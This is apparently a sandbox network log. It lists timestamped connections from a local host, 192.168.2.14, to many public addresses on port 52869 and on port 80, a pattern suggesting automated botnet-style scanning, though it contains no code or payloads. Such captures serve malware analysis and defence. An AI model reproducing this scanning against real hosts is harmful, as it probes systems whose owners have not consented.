                                                Jul 20, 2024 23:05:32.008821964 CEST2696652869192.168.2.14185.66.73.32
                                                Jul 20, 2024 23:05:32.008821964 CEST2696652869192.168.2.14165.35.29.207
                                                Jul 20, 2024 23:05:32.008821964 CEST2696652869192.168.2.14185.83.226.152
                                                Jul 20, 2024 23:05:32.008821964 CEST2696652869192.168.2.14176.224.134.202
                                                Jul 20, 2024 23:05:32.008821964 CEST2696652869192.168.2.14170.238.6.76
                                                Jul 20, 2024 23:05:32.008821964 CEST2696652869192.168.2.14102.92.87.20
                                                Jul 20, 2024 23:05:32.009001970 CEST2696652869192.168.2.14160.34.93.40
                                                Jul 20, 2024 23:05:32.009001970 CEST2696652869192.168.2.14219.66.177.143
                                                Jul 20, 2024 23:05:32.009001970 CEST2696652869192.168.2.1470.44.53.32
                                                Jul 20, 2024 23:05:32.009001970 CEST2696652869192.168.2.14132.127.155.20
                                                Jul 20, 2024 23:05:32.009001970 CEST2696652869192.168.2.14210.81.25.54
                                                Jul 20, 2024 23:05:32.009001970 CEST2696652869192.168.2.14143.189.174.32
                                                Jul 20, 2024 23:05:32.009002924 CEST2696652869192.168.2.14223.222.123.59
                                                Jul 20, 2024 23:05:32.009002924 CEST2696652869192.168.2.14197.181.147.41
                                                Jul 20, 2024 23:05:32.009351015 CEST2747880192.168.2.1495.100.201.122
                                                Jul 20, 2024 23:05:32.009640932 CEST2747880192.168.2.1495.236.83.119
                                                Jul 20, 2024 23:05:32.009680033 CEST5286926966180.112.125.192192.168.2.14
                                                Jul 20, 2024 23:05:32.009758949 CEST2696652869192.168.2.1413.234.82.233
                                                Jul 20, 2024 23:05:32.009758949 CEST2696652869192.168.2.14222.144.111.136
                                                Jul 20, 2024 23:05:32.009758949 CEST2696652869192.168.2.14218.76.143.250
                                                Jul 20, 2024 23:05:32.009758949 CEST2696652869192.168.2.14122.189.25.105
                                                Jul 20, 2024 23:05:32.009758949 CEST2696652869192.168.2.148.243.247.217
                                                Jul 20, 2024 23:05:32.009758949 CEST2696652869192.168.2.1484.42.51.191
                                                Jul 20, 2024 23:05:32.009758949 CEST2696652869192.168.2.14199.30.2.87
                                                Jul 20, 2024 23:05:32.009758949 CEST2696652869192.168.2.14196.248.250.76
                                                Jul 20, 2024 23:05:32.009785891 CEST2747880192.168.2.1495.17.124.99
                                                Jul 20, 2024 23:05:32.009785891 CEST2747880192.168.2.1495.57.6.186
                                                Jul 20, 2024 23:05:32.009785891 CEST2747880192.168.2.1495.59.134.24
                                                Jul 20, 2024 23:05:32.009785891 CEST2747880192.168.2.1495.62.179.67
                                                Jul 20, 2024 23:05:32.009785891 CEST2747880192.168.2.1495.61.168.150
                                                Jul 20, 2024 23:05:32.009785891 CEST2747880192.168.2.1495.139.191.115
                                                Jul 20, 2024 23:05:32.009785891 CEST2747880192.168.2.1495.213.60.63
                                                Jul 20, 2024 23:05:32.009826899 CEST2747880192.168.2.1495.119.118.209
                                                Jul 20, 2024 23:05:32.009826899 CEST2747880192.168.2.1495.189.164.11
                                                Jul 20, 2024 23:05:32.009826899 CEST2747880192.168.2.1495.85.128.197
                                                Jul 20, 2024 23:05:32.009826899 CEST2747880192.168.2.1495.104.136.90
                                                Jul 20, 2024 23:05:32.009828091 CEST2747880192.168.2.1495.55.62.244
                                                Jul 20, 2024 23:05:32.009828091 CEST2747880192.168.2.1495.158.80.43
                                                Jul 20, 2024 23:05:32.009913921 CEST2696652869192.168.2.14196.194.105.55
                                                Jul 20, 2024 23:05:32.009913921 CEST2696652869192.168.2.1482.244.247.159
                                                Jul 20, 2024 23:05:32.009913921 CEST2696652869192.168.2.1484.28.135.126
                                                Jul 20, 2024 23:05:32.009913921 CEST2696652869192.168.2.141.142.178.216
                                                Jul 20, 2024 23:05:32.009913921 CEST2696652869192.168.2.1499.81.223.53
                                                Jul 20, 2024 23:05:32.009913921 CEST2696652869192.168.2.1472.79.162.38
                                                Jul 20, 2024 23:05:32.009913921 CEST2696652869192.168.2.14157.67.163.111
                                                Jul 20, 2024 23:05:32.009913921 CEST2696652869192.168.2.141.160.152.237
                                                Jul 20, 2024 23:05:32.010452986 CEST2747880192.168.2.1495.220.228.215
                                                Jul 20, 2024 23:05:32.010452986 CEST2747880192.168.2.1495.41.85.63
                                                Jul 20, 2024 23:05:32.010452986 CEST2747880192.168.2.1495.156.74.111
                                                Jul 20, 2024 23:05:32.010452986 CEST2747880192.168.2.1495.232.173.19
                                                Jul 20, 2024 23:05:32.010452986 CEST2747880192.168.2.1495.115.64.83
                                                Jul 20, 2024 23:05:32.010452986 CEST2747880192.168.2.1495.136.249.39
                                                Jul 20, 2024 23:05:32.010452986 CEST2747880192.168.2.1495.75.247.171
                                                Jul 20, 2024 23:05:32.010452986 CEST2747880192.168.2.1495.7.161.207
                                                Jul 20, 2024 23:05:32.010643959 CEST528692696658.187.24.14192.168.2.14
                                                Jul 20, 2024 23:05:32.010720015 CEST2747880192.168.2.1495.36.201.87
                                                Jul 20, 2024 23:05:32.010720015 CEST2747880192.168.2.1495.31.158.7
                                                Jul 20, 2024 23:05:32.010720015 CEST2747880192.168.2.1495.57.115.181
                                                Jul 20, 2024 23:05:32.010720015 CEST2747880192.168.2.1495.182.35.196
                                                Jul 20, 2024 23:05:32.010720015 CEST2747880192.168.2.1495.237.41.55
                                                Jul 20, 2024 23:05:32.010720015 CEST2747880192.168.2.1495.211.239.130
                                                Jul 20, 2024 23:05:32.010720015 CEST2747880192.168.2.1495.171.109.242
                                                Jul 20, 2024 23:05:32.010853052 CEST528692696653.250.100.174192.168.2.14
                                                Jul 20, 2024 23:05:32.010895014 CEST2747880192.168.2.1495.121.142.215
                                                Jul 20, 2024 23:05:32.010895014 CEST2747880192.168.2.1495.59.184.231
                                                Jul 20, 2024 23:05:32.010895014 CEST2747880192.168.2.1495.77.250.166
                                                Jul 20, 2024 23:05:32.010895014 CEST2747880192.168.2.1495.243.3.180
                                                Jul 20, 2024 23:05:32.010895014 CEST2747880192.168.2.1495.12.251.221
                                                Jul 20, 2024 23:05:32.010895014 CEST2747880192.168.2.1495.220.243.61
                                                Jul 20, 2024 23:05:32.011029005 CEST528692696684.176.4.197192.168.2.14
                                                Jul 20, 2024 23:05:32.011281967 CEST2696652869192.168.2.14116.219.5.125
                                                Jul 20, 2024 23:05:32.011281967 CEST2696652869192.168.2.14151.161.78.139
                                                Jul 20, 2024 23:05:32.011281967 CEST2696652869192.168.2.14217.10.146.133
                                                Jul 20, 2024 23:05:32.011281967 CEST2696652869192.168.2.1450.169.78.0
                                                Jul 20, 2024 23:05:32.011281967 CEST2696652869192.168.2.1440.63.22.218
                                                Jul 20, 2024 23:05:32.011281967 CEST2696652869192.168.2.14111.107.133.4
                                                Jul 20, 2024 23:05:32.011281967 CEST2696652869192.168.2.14173.155.18.45
                                                Jul 20, 2024 23:05:32.011281967 CEST2696652869192.168.2.14206.64.31.236
                                                Jul 20, 2024 23:05:32.011523962 CEST2696652869192.168.2.1425.173.117.127
                                                Jul 20, 2024 23:05:32.011523962 CEST2696652869192.168.2.14202.179.32.99
                                                Jul 20, 2024 23:05:32.011523962 CEST2696652869192.168.2.14117.218.248.188
                                                Jul 20, 2024 23:05:32.011523962 CEST2696652869192.168.2.1446.88.221.209
                                                Jul 20, 2024 23:05:32.011523962 CEST2696652869192.168.2.14157.122.114.72
                                                Jul 20, 2024 23:05:32.011523962 CEST2696652869192.168.2.14209.12.19.10
                                                Jul 20, 2024 23:05:32.011523962 CEST2696652869192.168.2.14154.24.35.247
                                                Jul 20, 2024 23:05:32.011523962 CEST2696652869192.168.2.14178.74.79.246
                                                Jul 20, 2024 23:05:32.012084007 CEST2747880192.168.2.1495.207.149.105
                                                Jul 20, 2024 23:05:32.012084007 CEST2747880192.168.2.1495.246.233.118
                                                Jul 20, 2024 23:05:32.012084007 CEST2747880192.168.2.1495.106.187.139
                                                Jul 20, 2024 23:05:32.012084961 CEST2747880192.168.2.1495.191.67.246
                                                Jul 20, 2024 23:05:32.012084961 CEST2747880192.168.2.1495.81.227.113
                                                Jul 20, 2024 23:05:32.012084961 CEST2747880192.168.2.1495.183.13.8
                                                Jul 20, 2024 23:05:32.012084961 CEST2747880192.168.2.1495.67.19.107
                                                Jul 20, 2024 23:05:32.012084961 CEST2747880192.168.2.1495.214.176.104
                                                Jul 20, 2024 23:05:32.012201071 CEST2747880192.168.2.1495.50.236.32
                                                Jul 20, 2024 23:05:32.012201071 CEST2747880192.168.2.1495.234.250.137
                                                Jul 20, 2024 23:05:32.012201071 CEST2747880192.168.2.1495.122.145.119
                                                Jul 20, 2024 23:05:32.012201071 CEST2747880192.168.2.1495.88.159.153
                                                Jul 20, 2024 23:05:32.012398958 CEST2747880192.168.2.1495.187.58.238
                                                Jul 20, 2024 23:05:32.012398958 CEST2747880192.168.2.1495.164.165.175
                                                Jul 20, 2024 23:05:32.012398958 CEST2747880192.168.2.1495.219.116.49
                                                Jul 20, 2024 23:05:32.012398958 CEST2747880192.168.2.1495.255.231.56
                                                Jul 20, 2024 23:05:32.012398958 CEST2747880192.168.2.1495.159.5.85
                                                Jul 20, 2024 23:05:32.012398958 CEST2747880192.168.2.1495.224.183.85
                                                Jul 20, 2024 23:05:32.012398958 CEST2747880192.168.2.1495.63.149.249
                                                Jul 20, 2024 23:05:32.012398958 CEST2747880192.168.2.1495.101.7.150
                                                Jul 20, 2024 23:05:32.013679981 CEST2696652869192.168.2.14203.108.87.69
                                                Jul 20, 2024 23:05:32.013679981 CEST2696652869192.168.2.1446.126.78.10
                                                Jul 20, 2024 23:05:32.013679981 CEST2696652869192.168.2.141.144.229.105
                                                Jul 20, 2024 23:05:32.013679981 CEST2696652869192.168.2.14193.29.123.122
                                                Jul 20, 2024 23:05:32.013679981 CEST2696652869192.168.2.14198.228.20.233
                                                Jul 20, 2024 23:05:32.013679981 CEST2696652869192.168.2.14184.87.79.26
                                                Jul 20, 2024 23:05:32.013679981 CEST2696652869192.168.2.14190.4.139.242
                                                Jul 20, 2024 23:05:32.013679981 CEST2696652869192.168.2.14143.94.64.200
                                                Jul 20, 2024 23:05:32.013799906 CEST2696652869192.168.2.1466.117.167.70
                                                Jul 20, 2024 23:05:32.013799906 CEST2696652869192.168.2.14128.109.58.169
                                                Jul 20, 2024 23:05:32.013799906 CEST2696652869192.168.2.14168.150.44.111
                                                Jul 20, 2024 23:05:32.013799906 CEST2696652869192.168.2.14184.155.144.12
                                                Jul 20, 2024 23:05:32.013801098 CEST2696652869192.168.2.1444.31.73.44
                                                Jul 20, 2024 23:05:32.013801098 CEST2696652869192.168.2.14150.22.56.153
                                                Jul 20, 2024 23:05:32.013801098 CEST2696652869192.168.2.1413.72.181.91
                                                Jul 20, 2024 23:05:32.013801098 CEST2696652869192.168.2.14180.20.215.41
                                                Jul 20, 2024 23:05:32.014007092 CEST2747880192.168.2.1495.216.245.126
                                                Jul 20, 2024 23:05:32.014081001 CEST2696652869192.168.2.1413.89.114.62
                                                Jul 20, 2024 23:05:32.014081955 CEST2696652869192.168.2.14177.76.222.234
                                                Jul 20, 2024 23:05:32.014081955 CEST2696652869192.168.2.14211.230.13.173
                                                Jul 20, 2024 23:05:32.014081955 CEST2696652869192.168.2.14167.165.75.73
                                                Jul 20, 2024 23:05:32.014081955 CEST2696652869192.168.2.14145.137.68.101
                                                Jul 20, 2024 23:05:32.014081955 CEST2696652869192.168.2.1469.34.220.126
                                                Jul 20, 2024 23:05:32.014081955 CEST2696652869192.168.2.14123.115.221.42
                                                Jul 20, 2024 23:05:32.014081955 CEST2696652869192.168.2.14176.175.140.183
                                                Jul 20, 2024 23:05:32.015270948 CEST2696652869192.168.2.14212.117.81.111
                                                Jul 20, 2024 23:05:32.015270948 CEST2696652869192.168.2.14129.11.122.111
                                                Jul 20, 2024 23:05:32.015270948 CEST2696652869192.168.2.14177.5.153.6
                                                Jul 20, 2024 23:05:32.015270948 CEST2696652869192.168.2.1488.220.229.137
                                                Jul 20, 2024 23:05:32.015270948 CEST2696652869192.168.2.1459.246.146.95
                                                Jul 20, 2024 23:05:32.015270948 CEST2696652869192.168.2.1494.183.125.31
                                                Jul 20, 2024 23:05:32.015270948 CEST2696652869192.168.2.14207.173.20.157
                                                Jul 20, 2024 23:05:32.015270948 CEST2696652869192.168.2.1465.30.175.250
                                                Jul 20, 2024 23:05:32.015320063 CEST2696652869192.168.2.14208.213.254.132
                                                Jul 20, 2024 23:05:32.015320063 CEST2696652869192.168.2.14104.139.76.56
                                                Jul 20, 2024 23:05:32.015320063 CEST2696652869192.168.2.14166.79.80.42
                                                Jul 20, 2024 23:05:32.015321016 CEST2696652869192.168.2.14180.189.232.97
                                                Jul 20, 2024 23:05:32.015321016 CEST2696652869192.168.2.1420.141.224.39
                                                Jul 20, 2024 23:05:32.015321016 CEST2696652869192.168.2.1462.17.26.193
                                                Jul 20, 2024 23:05:32.015321016 CEST2696652869192.168.2.14156.75.110.98
                                                Jul 20, 2024 23:05:32.015321016 CEST2696652869192.168.2.1419.225.133.125
                                                Jul 20, 2024 23:05:32.015640974 CEST2696652869192.168.2.14124.232.179.12
                                                Jul 20, 2024 23:05:32.015641928 CEST2696652869192.168.2.14124.192.17.215
                                                Jul 20, 2024 23:05:32.015641928 CEST2696652869192.168.2.14211.192.23.252
                                                Jul 20, 2024 23:05:32.015641928 CEST2696652869192.168.2.14160.88.6.15
                                                Jul 20, 2024 23:05:32.015641928 CEST2696652869192.168.2.1499.129.21.21
                                                Jul 20, 2024 23:05:32.015641928 CEST2696652869192.168.2.14167.31.226.137
                                                Jul 20, 2024 23:05:32.015641928 CEST2696652869192.168.2.1462.30.169.120
                                                Jul 20, 2024 23:05:32.015641928 CEST2696652869192.168.2.14213.96.142.188
                                                Jul 20, 2024 23:05:32.015785933 CEST2696652869192.168.2.14180.249.131.251
                                                Jul 20, 2024 23:05:32.015785933 CEST2696652869192.168.2.1443.186.78.228
                                                Jul 20, 2024 23:05:32.015785933 CEST2696652869192.168.2.14171.203.141.24
                                                Jul 20, 2024 23:05:32.015785933 CEST2696652869192.168.2.1440.101.121.194
                                                Jul 20, 2024 23:05:32.015785933 CEST2696652869192.168.2.1450.40.58.134
                                                Jul 20, 2024 23:05:32.015785933 CEST2696652869192.168.2.1470.203.64.153
                                                Jul 20, 2024 23:05:32.015785933 CEST2696652869192.168.2.14140.146.33.123
                                                Jul 20, 2024 23:05:32.015785933 CEST2696652869192.168.2.1445.49.209.48
                                                Jul 20, 2024 23:05:32.016206026 CEST528692696684.176.4.197192.168.2.14
                                                Jul 20, 2024 23:05:32.016206980 CEST2696652869192.168.2.14126.213.114.105
                                                Jul 20, 2024 23:05:32.016206980 CEST2696652869192.168.2.1470.243.21.189
                                                Jul 20, 2024 23:05:32.016206980 CEST2696652869192.168.2.14206.175.193.81
                                                Jul 20, 2024 23:05:32.016206980 CEST2696652869192.168.2.1469.149.29.243
                                                Jul 20, 2024 23:05:32.016206980 CEST2696652869192.168.2.1491.252.143.99
                                                Jul 20, 2024 23:05:32.016206980 CEST2696652869192.168.2.1483.140.116.41
                                                Jul 20, 2024 23:05:32.016206980 CEST2696652869192.168.2.14158.147.144.114
                                                Jul 20, 2024 23:05:32.016206980 CEST2696652869192.168.2.14216.157.160.122
                                                Jul 20, 2024 23:05:32.016211987 CEST5286926966113.202.183.61192.168.2.14
                                                Jul 20, 2024 23:05:32.016216993 CEST5286926966201.92.64.129192.168.2.14
                                                Jul 20, 2024 23:05:32.016217947 CEST528692696699.35.215.64192.168.2.14
                                                Jul 20, 2024 23:05:32.016218901 CEST5286926966149.40.185.158192.168.2.14
                                                Jul 20, 2024 23:05:32.016218901 CEST528692696636.129.193.156192.168.2.14
                                                Jul 20, 2024 23:05:32.016220093 CEST528692696612.117.96.240192.168.2.14
                                                Jul 20, 2024 23:05:32.016220093 CEST528692696674.165.192.1192.168.2.14
                                                Jul 20, 2024 23:05:32.016221046 CEST5286926966179.8.112.110192.168.2.14
                                                Jul 20, 2024 23:05:32.016222000 CEST528692696654.179.197.253192.168.2.14
                                                Jul 20, 2024 23:05:32.016222954 CEST5286926966123.47.34.183192.168.2.14
                                                Jul 20, 2024 23:05:32.016222954 CEST52869269661.94.40.26192.168.2.14
                                                Jul 20, 2024 23:05:32.016223907 CEST5286926966104.168.168.224192.168.2.14
                                                Jul 20, 2024 23:05:32.016225100 CEST5286926966158.15.232.165192.168.2.14
                                                Jul 20, 2024 23:05:32.016226053 CEST5286926966136.176.36.12192.168.2.14
                                                Jul 20, 2024 23:05:32.016227007 CEST5286926966131.173.248.11192.168.2.14
                                                Jul 20, 2024 23:05:32.016227007 CEST5286926966138.179.150.234192.168.2.14
                                                Jul 20, 2024 23:05:32.016227007 CEST5286926966201.98.195.221192.168.2.14
                                                Jul 20, 2024 23:05:32.016227961 CEST52869269664.107.32.7192.168.2.14
                                                Jul 20, 2024 23:05:32.016228914 CEST5286926966158.199.47.135192.168.2.14
                                                Jul 20, 2024 23:05:32.016228914 CEST5286926966158.59.229.105192.168.2.14
                                                Jul 20, 2024 23:05:32.016230106 CEST5286926966117.161.21.35192.168.2.14
                                                Jul 20, 2024 23:05:32.016231060 CEST528692696632.156.133.181192.168.2.14
                                                Jul 20, 2024 23:05:32.016231060 CEST528692696677.165.177.101192.168.2.14
                                                Jul 20, 2024 23:05:32.016232014 CEST5286926966128.53.220.52192.168.2.14
                                                Jul 20, 2024 23:05:32.016232967 CEST528692696642.237.231.247192.168.2.14
                                                Jul 20, 2024 23:05:32.016232967 CEST5286926966118.128.140.96192.168.2.14
                                                Jul 20, 2024 23:05:32.016233921 CEST5286926966140.47.63.219192.168.2.14
                                                Jul 20, 2024 23:05:32.016235113 CEST528692696657.156.10.133192.168.2.14
                                                Jul 20, 2024 23:05:32.016235113 CEST5286926966174.220.73.245192.168.2.14
                                                Jul 20, 2024 23:05:32.016236067 CEST5286926966110.110.210.158192.168.2.14
                                                Jul 20, 2024 23:05:32.016236067 CEST5286926966211.168.65.67192.168.2.14
                                                Jul 20, 2024 23:05:32.016237020 CEST528692696637.155.160.245192.168.2.14
                                                Jul 20, 2024 23:05:32.016237974 CEST5286926966118.239.0.22192.168.2.14
                                                Jul 20, 2024 23:05:32.016238928 CEST5286926966160.34.93.40192.168.2.14
                                                Jul 20, 2024 23:05:32.016239882 CEST5286926966185.66.73.32192.168.2.14
                                                Jul 20, 2024 23:05:32.016241074 CEST5286926966165.35.29.207192.168.2.14
                                                Jul 20, 2024 23:05:32.016241074 CEST528692696698.92.244.227192.168.2.14
                                                Jul 20, 2024 23:05:32.016242027 CEST5286926966219.66.177.143192.168.2.14
                                                Jul 20, 2024 23:05:32.016242981 CEST528692696660.71.198.184192.168.2.14
                                                Jul 20, 2024 23:05:32.016247034 CEST528692696670.44.53.32192.168.2.14
                                                Jul 20, 2024 23:05:32.016247988 CEST528692696634.133.129.111192.168.2.14
                                                Jul 20, 2024 23:05:32.016248941 CEST5286926966133.38.109.131192.168.2.14
                                                Jul 20, 2024 23:05:32.016248941 CEST5286926966185.83.226.152192.168.2.14
                                                Jul 20, 2024 23:05:32.016249895 CEST5286926966138.196.94.202192.168.2.14
                                                Jul 20, 2024 23:05:32.016249895 CEST5286926966168.103.98.57192.168.2.14
                                                Jul 20, 2024 23:05:32.016251087 CEST5286926966132.127.155.20192.168.2.14
                                                Jul 20, 2024 23:05:32.016251087 CEST5286926966111.2.195.137192.168.2.14
                                                Jul 20, 2024 23:05:32.016252041 CEST5286926966101.168.57.208192.168.2.14
                                                Jul 20, 2024 23:05:32.016252041 CEST5286926966197.19.158.166192.168.2.14
                                                Jul 20, 2024 23:05:32.016252995 CEST802747895.100.201.122192.168.2.14
                                                Jul 20, 2024 23:05:32.016253948 CEST802747895.236.83.119192.168.2.14
                                                Jul 20, 2024 23:05:32.016253948 CEST5286926966175.153.54.159192.168.2.14
                                                Jul 20, 2024 23:05:32.016254902 CEST802747895.17.124.99192.168.2.14
                                                Jul 20, 2024 23:05:32.016254902 CEST5286926966176.224.134.202192.168.2.14
                                                Jul 20, 2024 23:05:32.016256094 CEST5286926966196.194.105.55192.168.2.14
                                                Jul 20, 2024 23:05:32.016257048 CEST5286926966131.37.148.1192.168.2.14
                                                Jul 20, 2024 23:05:32.016257048 CEST5286926966210.81.25.54192.168.2.14
                                                Jul 20, 2024 23:05:32.016258001 CEST5286926966149.255.36.61192.168.2.14
                                                Jul 20, 2024 23:05:32.016258955 CEST802747895.119.118.209192.168.2.14
                                                Jul 20, 2024 23:05:32.016258955 CEST802747895.57.6.186192.168.2.14
                                                Jul 20, 2024 23:05:32.016259909 CEST802747895.59.134.24192.168.2.14
                                                Jul 20, 2024 23:05:32.016259909 CEST802747895.62.179.67192.168.2.14
                                                Jul 20, 2024 23:05:32.016278028 CEST802747895.189.164.11192.168.2.14
                                                Jul 20, 2024 23:05:32.016279936 CEST802747895.61.168.150192.168.2.14
                                                Jul 20, 2024 23:05:32.016280890 CEST802747895.220.228.215192.168.2.14
                                                Jul 20, 2024 23:05:32.016280890 CEST802747895.85.128.197192.168.2.14
                                                Jul 20, 2024 23:05:32.016282082 CEST802747895.139.191.115192.168.2.14
                                                Jul 20, 2024 23:05:32.016283035 CEST802747895.104.136.90192.168.2.14
                                                Jul 20, 2024 23:05:32.016283989 CEST802747895.41.85.63192.168.2.14
                                                Jul 20, 2024 23:05:32.016284943 CEST802747895.55.62.244192.168.2.14
                                                Jul 20, 2024 23:05:32.016285896 CEST802747895.213.60.63192.168.2.14
                                                Jul 20, 2024 23:05:32.016285896 CEST5286926966108.224.254.63192.168.2.14
                                                Jul 20, 2024 23:05:32.016287088 CEST802747895.156.74.111192.168.2.14
                                                Jul 20, 2024 23:05:32.016292095 CEST802747895.158.80.43192.168.2.14
                                                Jul 20, 2024 23:05:32.016297102 CEST802747895.232.173.19192.168.2.14
                                                Jul 20, 2024 23:05:32.016302109 CEST802747895.36.201.87192.168.2.14
                                                Jul 20, 2024 23:05:32.016390085 CEST2747880192.168.2.1495.17.124.99
                                                Jul 20, 2024 23:05:32.016408920 CEST2747880192.168.2.1495.119.118.209
                                                Jul 20, 2024 23:05:32.016408920 CEST2747880192.168.2.1495.189.164.11
                                                Jul 20, 2024 23:05:32.016408920 CEST2747880192.168.2.1495.236.83.119
                                                Jul 20, 2024 23:05:32.016422987 CEST2747880192.168.2.1495.220.228.215
                                                Jul 20, 2024 23:05:32.016520023 CEST802747895.121.142.215192.168.2.14
                                                Jul 20, 2024 23:05:32.016554117 CEST2747880192.168.2.1495.41.85.63
                                                Jul 20, 2024 23:05:32.016555071 CEST2747880192.168.2.1495.232.173.19
                                                Jul 20, 2024 23:05:32.016555071 CEST2747880192.168.2.1495.156.74.111
                                                Jul 20, 2024 23:05:32.016590118 CEST802747895.115.64.83192.168.2.14
                                                Jul 20, 2024 23:05:32.016596079 CEST802747895.31.158.7192.168.2.14
                                                Jul 20, 2024 23:05:32.016601086 CEST802747895.59.184.231192.168.2.14
                                                Jul 20, 2024 23:05:32.016602039 CEST2747880192.168.2.1495.59.134.24
                                                Jul 20, 2024 23:05:32.016602039 CEST2747880192.168.2.1495.61.168.150
                                                Jul 20, 2024 23:05:32.016602039 CEST2747880192.168.2.1495.100.201.122
                                                Jul 20, 2024 23:05:32.016602993 CEST2747880192.168.2.1495.213.60.63
                                                Jul 20, 2024 23:05:32.016602993 CEST2747880192.168.2.1495.57.6.186
                                                Jul 20, 2024 23:05:32.016602993 CEST2747880192.168.2.1495.62.179.67
                                                Jul 20, 2024 23:05:32.016602993 CEST2747880192.168.2.1495.139.191.115
                                                Jul 20, 2024 23:05:32.016602993 CEST2747880192.168.2.1495.36.201.87
                                                Jul 20, 2024 23:05:32.016611099 CEST5286926966170.238.6.76192.168.2.14
                                                Jul 20, 2024 23:05:32.016614914 CEST5286926966143.189.174.32192.168.2.14
                                                Jul 20, 2024 23:05:32.016619921 CEST528692696613.234.82.233192.168.2.14
                                                Jul 20, 2024 23:05:32.016635895 CEST528692696652.137.137.200192.168.2.14
                                                Jul 20, 2024 23:05:32.016639948 CEST5286926966222.144.111.136192.168.2.14
                                                Jul 20, 2024 23:05:32.016644001 CEST5286926966116.219.5.125192.168.2.14
                                                Jul 20, 2024 23:05:32.016715050 CEST802747895.57.115.181192.168.2.14
                                                Jul 20, 2024 23:05:32.016767979 CEST802747895.136.249.39192.168.2.14
                                                Jul 20, 2024 23:05:32.016773939 CEST5286926966102.92.87.20192.168.2.14
                                                Jul 20, 2024 23:05:32.016777992 CEST528692696682.244.247.159192.168.2.14
                                                Jul 20, 2024 23:05:32.016793013 CEST802747895.77.250.166192.168.2.14
                                                Jul 20, 2024 23:05:32.016850948 CEST802747895.182.35.196192.168.2.14
                                                Jul 20, 2024 23:05:32.016917944 CEST802747895.75.247.171192.168.2.14
                                                Jul 20, 2024 23:05:32.017079115 CEST2747880192.168.2.1495.85.128.197
                                                Jul 20, 2024 23:05:32.017079115 CEST2747880192.168.2.1495.104.136.90
                                                Jul 20, 2024 23:05:32.017079115 CEST2747880192.168.2.1495.55.62.244
                                                Jul 20, 2024 23:05:32.017079115 CEST2747880192.168.2.1495.158.80.43
                                                Jul 20, 2024 23:05:32.017079115 CEST2747880192.168.2.1495.121.142.215
                                                Jul 20, 2024 23:05:32.017079115 CEST2747880192.168.2.1495.59.184.231
                                                Jul 20, 2024 23:05:32.017079115 CEST2747880192.168.2.1495.77.250.166
                                                Jul 20, 2024 23:05:32.017201900 CEST802747895.237.41.55192.168.2.14
                                                Jul 20, 2024 23:05:32.017304897 CEST2696652869192.168.2.14184.72.244.166
                                                Jul 20, 2024 23:05:32.017304897 CEST2696652869192.168.2.1466.112.35.179
                                                Jul 20, 2024 23:05:32.017304897 CEST2696652869192.168.2.14222.43.96.53
                                                Jul 20, 2024 23:05:32.017304897 CEST2696652869192.168.2.1447.136.236.117
                                                Jul 20, 2024 23:05:32.017304897 CEST2696652869192.168.2.14126.145.61.211
                                                Jul 20, 2024 23:05:32.017304897 CEST2696652869192.168.2.14137.110.96.64
                                                Jul 20, 2024 23:05:32.017304897 CEST2696652869192.168.2.1487.140.196.185
                                                Jul 20, 2024 23:05:32.017304897 CEST2696652869192.168.2.141.159.73.15
                                                Jul 20, 2024 23:05:32.017457008 CEST528692696684.28.135.126192.168.2.14
                                                Jul 20, 2024 23:05:32.017462015 CEST5286926966151.161.78.139192.168.2.14
                                                Jul 20, 2024 23:05:32.017467022 CEST5286926966218.76.143.250192.168.2.14
                                                Jul 20, 2024 23:05:32.017494917 CEST5286926966223.222.123.59192.168.2.14
                                                Jul 20, 2024 23:05:32.017505884 CEST528692696625.173.117.127192.168.2.14
                                                Jul 20, 2024 23:05:32.017530918 CEST802747895.243.3.180192.168.2.14
                                                Jul 20, 2024 23:05:32.017577887 CEST2747880192.168.2.1495.115.64.83
                                                Jul 20, 2024 23:05:32.017577887 CEST2747880192.168.2.1495.136.249.39
                                                Jul 20, 2024 23:05:32.017577887 CEST2747880192.168.2.1495.75.247.171
                                                Jul 20, 2024 23:05:32.017869949 CEST802747895.7.161.207192.168.2.14
                                                Jul 20, 2024 23:05:32.017884970 CEST802747895.12.251.221192.168.2.14
                                                Jul 20, 2024 23:05:32.017925024 CEST802747895.207.149.105192.168.2.14
                                                Jul 20, 2024 23:05:32.017929077 CEST802747895.220.243.61192.168.2.14
                                                Jul 20, 2024 23:05:32.018021107 CEST802747895.246.233.118192.168.2.14
                                                Jul 20, 2024 23:05:32.018026114 CEST802747895.211.239.130192.168.2.14
                                                Jul 20, 2024 23:05:32.018030882 CEST802747895.106.187.139192.168.2.14
                                                Jul 20, 2024 23:05:32.018040895 CEST802747895.50.236.32192.168.2.14
                                                Jul 20, 2024 23:05:32.018045902 CEST802747895.171.109.242192.168.2.14
                                                Jul 20, 2024 23:05:32.018049955 CEST802747895.234.250.137192.168.2.14
                                                Jul 20, 2024 23:05:32.018059969 CEST802747895.187.58.238192.168.2.14
                                                Jul 20, 2024 23:05:32.018064022 CEST802747895.191.67.246192.168.2.14
                                                Jul 20, 2024 23:05:32.018069983 CEST802747895.164.165.175192.168.2.14
                                                Jul 20, 2024 23:05:32.018074036 CEST5286926966217.10.146.133192.168.2.14
                                                Jul 20, 2024 23:05:32.018079042 CEST52869269661.142.178.216192.168.2.14
                                                Jul 20, 2024 23:05:32.018083096 CEST5286926966122.189.25.105192.168.2.14
                                                Jul 20, 2024 23:05:32.018217087 CEST2747880192.168.2.1495.31.158.7
                                                Jul 20, 2024 23:05:32.018217087 CEST2747880192.168.2.1495.57.115.181
                                                Jul 20, 2024 23:05:32.018217087 CEST2747880192.168.2.1495.182.35.196
                                                Jul 20, 2024 23:05:32.018217087 CEST2747880192.168.2.1495.237.41.55
                                                Jul 20, 2024 23:05:32.018217087 CEST2747880192.168.2.1495.211.239.130
                                                Jul 20, 2024 23:05:32.018217087 CEST2747880192.168.2.1495.187.58.238
                                                Jul 20, 2024 23:05:32.018217087 CEST2747880192.168.2.1495.171.109.242
                                                Jul 20, 2024 23:05:32.018249035 CEST528692696699.81.223.53192.168.2.14
                                                Jul 20, 2024 23:05:32.018254042 CEST52869269668.243.247.217192.168.2.14
                                                Jul 20, 2024 23:05:32.018258095 CEST528692696650.169.78.0192.168.2.14
                                                Jul 20, 2024 23:05:32.018266916 CEST2747880192.168.2.1495.7.161.207
                                                Jul 20, 2024 23:05:32.018266916 CEST2747880192.168.2.1495.207.149.105
                                                Jul 20, 2024 23:05:32.018266916 CEST2747880192.168.2.1495.246.233.118
                                                Jul 20, 2024 23:05:32.018266916 CEST2747880192.168.2.1495.106.187.139
                                                Jul 20, 2024 23:05:32.018268108 CEST2747880192.168.2.1495.191.67.246
                                                Jul 20, 2024 23:05:32.018270969 CEST802747895.122.145.119192.168.2.14
